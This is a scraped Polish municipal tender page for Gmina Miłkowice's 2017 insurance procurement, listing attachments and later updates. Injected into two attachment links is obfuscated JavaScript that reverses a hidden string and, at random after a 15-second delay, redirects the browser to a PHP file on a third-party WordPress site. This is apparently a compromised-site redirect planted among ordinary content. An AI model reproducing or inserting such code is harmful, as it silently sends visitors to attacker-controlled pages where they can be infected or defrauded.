Data dodania: 2017-05-18 godz. 10:06

Data ogłoszenia: 2017-05-18

Usługa ubezpieczenia Gminy Miłkowice oraz podległych jednostek organizacyjnych

Znak sprawy 7/2017/MIENIE+OC+NNW_KOM/NO/K/BU

 

OGŁOSZENIE O ZAMÓWIENIU

SIWZ NIEOGRANICZONY _Gmina Miłkowice

Załącznik nr 1 do SIWZ – PD Opis przedmiotu zamówienia – warunki ubezpieczenia

Załącznik nr 2 do SIWZ – Szkodowość

Załącznik nr 3 do SIWZ – Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej

Załącznik nr 4 do SIWZ – Oświadczenie dotyczące przesłanek wykluczenia z postępowania

Załącznik nr 5 do SIWZ – Oświadczenie dotyczące spełniania warunków udziału w postępowaniu

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_Część-1.doc”>Załącznik nr 6 do SIWZ – Formularz ofertowy_Część 1

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_Część-2.doc”>Załącznik nr 7 do SIWZ – Formularz ofertowy_Część 2

Załącznik nr 8 do SIWZ – Projekt umowy generalnej_Część 1

Załącznik nr 9 do SIWZ – Projekt umowy generalnej_Część 2

Załącznik nr 10 do SIWZ – Wykaz pojazdów

Załącznik nr 11 do SIWZ – Wykaz mienia_Urząd Gminy

Załącznik nr 12 do SIWZ – Wykaz mienia_SP Rzeszotary

Załącznik nr 13 do SIWZ – Wykaz mienia_SGZS Miłkowice

Załącznik nr 14 do SIWZ – Wykaz mienia_GOZ Miłkowice

Załącznik nr 15 do SIWZ – Wykaz mienia_GOPS Miłkowice

Załącznik nr 16 do SIWZ – Wykaz mienia_GOKIS Miłkowice

Załącznik nr 17 do SIWZ – Sumy ubezpieczenia łącznie

Załącznik nr 18 do SIWZ – Informacje do oceny ryzyka_Urząd Gminy

Załącznik nr 19 do SIWZ – Informacje do oceny ryzyka_SP Rzeszotary

Załącznik nr 20 do SIWZ – Informacje do oceny ryzyka_SGZS Miłkowice

Załącznik nr 21 do SIWZ – Informacje do oceny ryzyka_GOZ Miłkowice

Załącznik nr 22 do SIWZ – Informacje do oceny ryzyka_GOKIS Miłkowice

 

Data dodania: 2017-05-24 godz. 10:53

Ogłoszenie o zmianie ogłoszenia

Odpowiedzi na pytania modyfikacja SIWZ

 

Data dodania: 2017-05-25 godz. 13:56

Odpowiedzi na pytania modyfikacja SIWZ_

Załącznik nr 18 do SIWZ – Informacje do oceny ryzyka_Urząd Gminy

Załącznik nr 21 do SIWZ – Informacje do oceny ryzyka_GOZ Miłkowice

Załącznik nr 22 do SIWZ – Informacje do oceny ryzyka_GOKIS Miłkowice

 

Data dodania: 2017-05-26 godz. 11:05

Odpowiedzi na pytania modyfikacja SIWZ

 

Data dodania: 2017-05-29 godz. 8:41

Odpowiedzi na pytania modyfikacja SIWZ

 

Data dodania: 2017-05-30 godz. 14:04

Informacje z otwarcia ofert

 

Data dodania: 2017-06-06 godz. 9:54

Zawiadomienie o wynikach